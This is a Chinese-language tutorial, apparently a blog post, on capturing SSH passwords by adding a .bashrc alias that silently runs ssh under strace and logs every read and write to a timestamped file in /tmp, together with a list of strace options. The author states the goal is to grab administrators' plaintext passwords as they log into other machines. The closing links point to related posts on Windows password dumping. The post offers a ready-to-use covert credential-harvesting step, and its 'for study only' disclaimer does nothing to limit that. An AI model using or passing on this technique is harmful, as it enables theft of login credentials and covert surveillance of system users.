SSH Keylogger密码抓取
简介
SSH Keylogger终端切换用户记录用户输入的终端信息可获取密码
主要利用strace系统调试工具获取ssh的读写连接的数据,以达到抓取管理员登陆其他机器的明文密码的作用。
Strace
strace命令是一个集诊断、调试、统计于一体的工具,常用来跟踪进程执行时的系统调用和所接收的信号,可以用它来监控用户空间进程和内核的交互。
参数:
-c 统计每一系统调用的所执行的时间,次数和出错的次数等.
-d 输出strace关于标准错误的调试信息.
-f 跟踪由fork调用所产生的子进程.
-i 输出系统调用的入口指针.
-q 禁止输出关于脱离的消息.
-r 打印出相对时间关于,,每一个系统调用.
-t 在输出中的每一行前加上时间信息.
-T 显示每一调用所耗的时间.
-e expr 指定一个表达式,用来控制如何跟踪.格式:[qualifier=][!]value1[,value2]
-e trace=process 只跟踪有关进程控制的系统调用.
-e trace=network 跟踪与网络有关的所有系统调用.
-e strace=signal 跟踪所有与系统信号有关的系统调用.
-e trace=ipc 跟踪所有与进程通讯有关的系统调用.
-e abbrev=set 设定strace输出的系统调用的结果集.-v 等于abbrev=none.默认为abbrev=all.
-e raw=set 将指定的系统调用的参数以十六进制显示.
-o filename 将strace的输出写入文件filename
-p pid 跟踪指定的进程pid.
-s strsize 指定输出的字符串的最大长度.默认为32.文件名一直全部输出.
-u username 以username的UID和GID执行被跟踪的命令
SSH Keylogger
首先确保Linux主机已经安装strace工具并且能够正常使用
编辑用户家目录文件夹中的一个隐藏文件 '.bashrc' 并添加如下代码
vi .bashrc
#添加
alias ssh='strace -o /tmp/ssh-`date "+%m-%d-%H-%M"`.log -e read,write -s200 ssh'
#%m 表示月
#%d 表示日
#%H 表示小时
%M 表示分钟
运行命令 'source .bashrc' 是配置生效
source .bashrc
source命令用于重新执行修改的初始化文件使之立即生效,而不必注销并重新登录
'.bashrc' 文件就相当于 shell 的配置文件
Linux 系统中有很多 shell,包括bash,sh,zsh,dash等,不管哪种 shell 都会有一个
.bashrc
的隐藏文件,主要保存个人的一些个性化设置,如命令别名、路径等
然后再尝试使用ssh命令登录到其他的用户
则会在将交互时的所有信息保存在 /tmp 目录下的一个文件中,可以自己指定生成的文件路径
cat /tmp/ssh-11-16-06-05.log
终端中输入密码时不可见,但是输入的密码键盘记录会保存在文件当中,终端中的所有显示同样会保存在文件当中。
但是好像只能在当前用户的终端进行ssh命令才会记录相关信息,不在用户的终端中进行正常的ssh连接则不会记录相关的信息。
声明
提供的技术仅供学习参考测试,利用本文提供的信息造成的直接或间接损失由使用者自行承担。
结语
没有那么多天赋异禀,优秀的人总是努力地翻山越岭。
SSH Keylogger密码抓取相关推荐
- Windows系统密码抓取与防护
Windows系统密码抓取与防护 单机密码抓取与防范 LM Hash 和NTLM Hash LM Hash(DES加密) 默认禁用,一般攻击者抓取的LM Hash值为aad3b435b51404eea ...
- 关于Windows系列密码抓取
首先,还是回顾一下windows系统密码Hash的一些知识吧:(下面这段来自网络) 首先介绍一下windows密码Hash: 早期SMB协议在网络上传输明文口令.后来出现"LAN Manag ...
- 内网安全之:Windows 密码抓取
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关.倡导维护网络安全人人有责,共同维护网络文明和谐. Wi ...
- windows密码抓取的多种方法
0x01 准备阶段 1.下载pwdump7: 链接:https://pan.baidu.com/s/1zhSJTNnAl43BHblWU3nI5A 提取码:f74o 解压密码:321 (为啥 ...
- linux用户密码转换为明文,Linux strace 明文密码抓取
strace常用来跟踪进程执行时的系统调用和所接收的信号,默认是没有安装,但是往往在提权后我们想得到root密码,我们可以使用这种方法来获取明文密码.安装很简单就一条命令 (Test On cento ...
- HackBrowserData密码抓取
一.简介 hack-browser-data是一个开源工具,可以帮助您从浏览器解密数据(密码|书签| cookie |历史记录|信用卡|下载链接).它支持市场上最受欢迎的浏览器,并可以在Windows ...
- 内网渗透(二十四)之Windows协议认证和密码抓取-Mimikatz读取sam和lsass获取密码
系列文章第一章节之基础知识篇 内网渗透(一)之基础知识-内网渗透介绍和概述 内网渗透(二)之基础知识-工作组介绍 内网渗透(三)之基础知识-域环境的介绍和优点 内网渗透(四)之基础知识-搭建域环境 内 ...
- linux下抓管理员hash,Linux下抓取登陆用户密码神器mimipenguin
windows下有Mimikatz,现在linux下有了mimipenguin,国外安全研究员huntergregal发布了工具mimipenguin,一款Linux下的密码抓取神器,弥补了Linux ...
- [网络安全自学篇] 五十.虚拟机基础之安装XP系统、文件共享、网络快照设置及Wireshark抓取BBS密码
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了Procmon软件基本用法及文件进程.注册表查看,这是一款微软推荐的系 ...
最新文章
- tcpdump 命令的个常用选项:三
- AC解 - Phone List(HDOJ#1671) 前缀树的一个应用
- Delphi的笔记整理(一)
- 如何查找SAP Fiori launchpad Designer的准确路径即url地址
- CAlayer层的属性
- css设置按钮竖直方向居中_如何借助伪元素实现垂直居中?
- 用python画桃花_python 画图
- thinkphp5 return 返回空_网红饮品大杯约1/3是空的!店员:这是公司设计的中空隔冷层...
- 测试 jdbc 中连接关闭的时机
- 使用 Python 构建电影推荐系统
- 使用AD域管理您的本地计算机密码
- 程序员经常浏览的网站
- Image.Save 方法
- web实现html页面思维导图效果
- 锐龙r9 5900hx和i7 11800h哪个好 i711800h和锐龙r95900hx对比
- [转]用天文方法计算日月合朔(新月)
- 非常感人的情感日志:这些话看哭了很多人
- 谈Java语言规范之枚举类型
- i5 1135g7和i5 1035g1参数对比区别大吗? 哪个好
- WiFi市场之我见(3)
热门文章
- mysql 排除字段_mysql中select某表时排除个别字段,shell实现
- 读取qq聊天记录文件(诺基亚塞班S60v3平台)
- java计算机毕业设计进出货管理系统(附源码、数据库)
- Spring实战读书笔记 高级装配(1)
- Python3 Wgs84\gcj02\bd09\mercator\bd09mc坐标系转换与投影
- JS中本地存储的方式有哪些?
- 一看就懂!renren-fast 快速开发框架使用以及开发文档
- c# 小票机打印二维条码_C# winform小票打印
- 经验正交函数 (EOF) / 主成分 (PCA) 分解及Python实现
- 滚动轴承故障诊断MATLAB程序:快速谱峭度、谱峭度+包络谱分析